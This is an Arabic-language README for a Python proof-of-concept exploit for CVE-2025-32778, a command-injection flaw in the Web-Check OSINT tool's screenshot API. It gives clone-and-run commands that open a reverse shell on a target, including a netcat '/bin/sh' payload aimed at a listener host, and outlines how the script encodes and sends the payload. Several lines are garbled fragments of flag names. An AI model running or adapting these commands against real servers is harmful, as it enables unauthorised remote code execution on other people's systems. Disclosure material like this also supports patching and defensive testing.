
استغلال PoC لـ CVE-2025-32778: حقن أوامر في أداة Web-Check OSINT
CVE-2025-32778 هي ثغرة حرجة لحقن الأوامر في أداة Web-Check الخاصة بـ OSINT من Lissy93.
تتيح للمهاجمين غير الموثّقين تنفيذ أوامر نظام تعسفية عبر معامل url في واجهة برمجة تطبيقات لقطة الشاشة.
يقوم هذا النص البرمجي بلغة Python بأتمتة الاستغلال ويمكنه إنشاء شيلات عكسية أو قبول حمولات شيل مخصصة.
url في Web-Check.--lhost و .--lport--shell.--shell و --lhost/--lport.pip install requests
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
python3 cve-2025-32778.py -h
تطبيع عنوان الهدف إلى scheme://host[:port].
تحضير الحمولة:
--lhost و --lport.--shell.ترميز حمولة الشيل لحقن آمن في عنوان URL.
إرسال طلب HTTP GET إلى /api/screenshot/ مع الحمولة.
انتظار اتصال الشيل العكسي.
00xCanelo
ملف تعريف GitHub